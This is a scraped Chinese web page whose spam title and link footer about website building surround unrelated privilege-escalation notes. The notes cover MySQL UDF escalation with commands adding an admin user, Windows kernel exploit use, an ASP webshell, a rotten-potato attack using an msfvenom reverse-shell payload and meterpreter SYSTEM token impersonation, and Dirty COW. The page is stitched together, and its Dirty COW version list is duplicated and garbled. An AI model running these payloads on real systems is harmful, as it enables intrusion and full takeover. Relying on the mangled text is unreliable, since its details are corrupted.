当前位置: 首页 > news >正文

大朗镇仿做网站网站如何做好优化

news 2026/1/13 14:21:03
大朗镇仿做网站,网站如何做好优化,wordpress免费企业,wordpress 主页地址1. MySQL提权 1.1 UDF提权 udf ‘user defined function’#xff0c;即’用户自定义函数’。是通过添加新函数#xff0c;对MYSQL的功能进行扩充 1、如何获得udf文件 2、将文件放到哪才能让mysql承认这个函数 3、函数功能 4、为什么这东西能提权(自定义函数指令是直接…1. MySQL提权 1.1 UDF提权 udf ‘user defined function’即’用户自定义函数’。是通过添加新函数对MYSQL的功能进行扩充 1、如何获得udf文件 2、将文件放到哪才能让mysql承认这个函数 3、函数功能 4、为什么这东西能提权(自定义函数指令是直接以管理员的权限运行的) 1.1.1 前提 SQL 注入且是高权限 secure_file_priv 无限制 plugin 目录可写 1.1.2 sqlmap udf位置 /usr/share/metasploit-framework/data/exploits/mysql /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 暂时不能用需要解码 cd /usr/share/sqlmap/extra/cloak python3 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 放到哪 MySQL5.0导出路径随意 5.0 MySQL5.1则需要导出至目标服务器的系统目录如system32 MySQL 5.1以上版本必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。select basedir; lib/plugin/ 创建函数 create function sys_eval returns string soname ‘udf.dll’; select sys_eval(‘whoami’); net user test test /addnet localgroup administrators test /add函数功能 sys_eval 执行任意命令并将输出返回。 sys_exec 执行任意命令并将退出码返回。 sys_get 获取一个环境变量。 sys_set 创建或修改一个环境变量。 2. Windows提权 提权更多的溢出提权 内存溢出 自己的堆栈返回到了root的堆栈返回到root的堆栈后执行程序的权限就是root的权限 2.1 内核提权 别用python3 ms16-032 检测脚本 https://github.com/AonCyberLabs/Windows-Exploit-Suggester python -m pip install xlrd1.2.0 python windows-exploit-suggester.py --update python windows-exploit-suggester.py --database 2023-07-07-mssb.xls --systeminfo 1.txt ms16-032 exp https://github.com/SecWiki/windows-kernel-exploits 2.1.1实操 在普通用户界面运行systeminfo语句并将执行结果的屏幕输出重定向到一个文件中。 systeminfo 1.txt打开文件查看内容发现有安全补丁。 因为1.txt中有系统的信息可以在微软官网找到该版本的系统有哪些漏洞。再根据系统的补丁查找可以利用的漏洞。 将1.txt文件复制到攻击机中在攻击机中下载好攻击脚本 下载好的python脚本会自动去微软官网下载想要攻击的主机系统版本的补丁全部下载给这个脚本一个systeminfo将系统信息和补丁进行对比找出可利用漏洞。 python -m pip install xlrd1.2.0 python windows-exploit-suggester.py --update #下载系统所有补丁python windows-exploit-suggester.py --database 2023-10-11-mssb.xls --systeminfo 1.txt下载好利用payload可执行文件木马后开启web服务器 python -m http.server 80在普通用户主机上访问并下载payload可执行文件木马 下载好payload后直接运行可执行文件执行木马进行提权 自始至终在受害者主机只做了三步 systeminfo下载木马执行木马 2.2 烂土豆(ms16-075) asp木马 %execute(request(xiu))%TkI0V0gtQkJCWVYtM01QUEMtOVJDTVYtNDZYQ0I 安装2012IISFTP把msf木马利用ftp上传到2012执行 利用webshell运行msf木马 2.2.1 原理 欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到控制的TCP终端 对这个认证过程使用中间人攻击NTLM重放为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。 模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数服务型账户IIS、MSSQL等都有这个权限用户级账户大多数没有这个权限。 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075 msf生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.0.113 LPORT5555 -f exe shell.exe use exploit/multi/handler meterpreter getuid meterpreter upload /root/potato.exe C:\Users\Public meterpreter cd C:\\Users\\Public meterpreter use incognito meterpreter list_tokens -u meterpreter execute -cH -f ./potato.exe meterpreter list_tokens -u AUTHORITY\SYSTEM meterpreter impersonate_token NT AUTHORITY\\SYSTEM meterpreter getuid 3. Linux提权 https://github.com/InteliSecureLabs/Linux_Exploit_Suggester 3.1 脏牛漏洞 gcc -pthread dirty.c -o dirty -lcrypt 利用版本必须低于如下版本 Centos7 /RHEL7 3.10.0-327.36.3.el7 Cetnos6/RHEL6 2.6.32-642.6.2.el6 Ubuntu 16.10 4.8.0-26.28 Ubuntu 16.04 4.4.0-45.66 Ubuntu 14.04 3.13.0-100.147 Debian 8 3.16.36-1deb8u2 Debian 7 3.2.82-1.36.3.el7 Cetnos6/RHEL6 2.6.32-642.6.2.el6 Ubuntu 16.10 4.8.0-26.28 Ubuntu 16.04 4.4.0-45.66 Ubuntu 14.04 3.13.0-100.147 Debian 8 3.16.36-1deb8u2 Debian 7 3.2.82-1
http://www.yutouwan.com/news/4271/

相关文章:

  • 外包建设网站服务成功案例
  • 网站建设方案和报价辽宁网站建设公司
  • 怎样做百度网站网站建设远洋国际
  • 大名网站建设公司王老吉网站建设水平优点
  • 网站上微信引流怎么做的网站推广营销效果
  • wordpress局域网建站专业建站公司报价
  • 备案名称和网站名称不一致wordpress 用iis建站
  • 企业网站建设费用需要多少钱服务营销的七个要素
  • 可以做司法考试题的网站设计师专业网站
  • 大学生校园活动策划书湖北企业网站优化排名
  • 厦门营销型网站建设站长之家ping
  • 论文收录网站广州注册公司迁到佛山可以吗
  • 微信公众号服务号网站开发流程图wordpress文字环绕图片
  • 可以自己做网站的软件国际互联网出口
  • 面向服务的关系建设网站垂直网站建设的关键因素
  • 鄂尔多斯网站制作 建设京东上怎样做网站
  • 网站内部链接是怎么做的帝国网站免费模板
  • 网站后台支持的字体免费pc 微网站模板
  • android应用开发详解杭州seo全网营销
  • h5自适应网站模板下载源码分享网
  • 电商网站页面布局网站流量统计怎么做的
  • 公司网站宣传自己做的灯展怎么给网站做百度优化
  • 做电影网站怎样赚钱吗该网站使用的安全设置
  • 大型网站开发用的技术网站订单模板
  • 企业网站开发哪家专业人员优化方案怎么写
  • 网站分站系上海注册公司需要多少钱
  • 物流信息网站有哪些网游大全
  • 做公司网站的多少钱免费的com域名注册
  • 个人怎么做网站页面ps做图软件怎么下载网站
  • 国外网站视觉设计趋势做网站的例子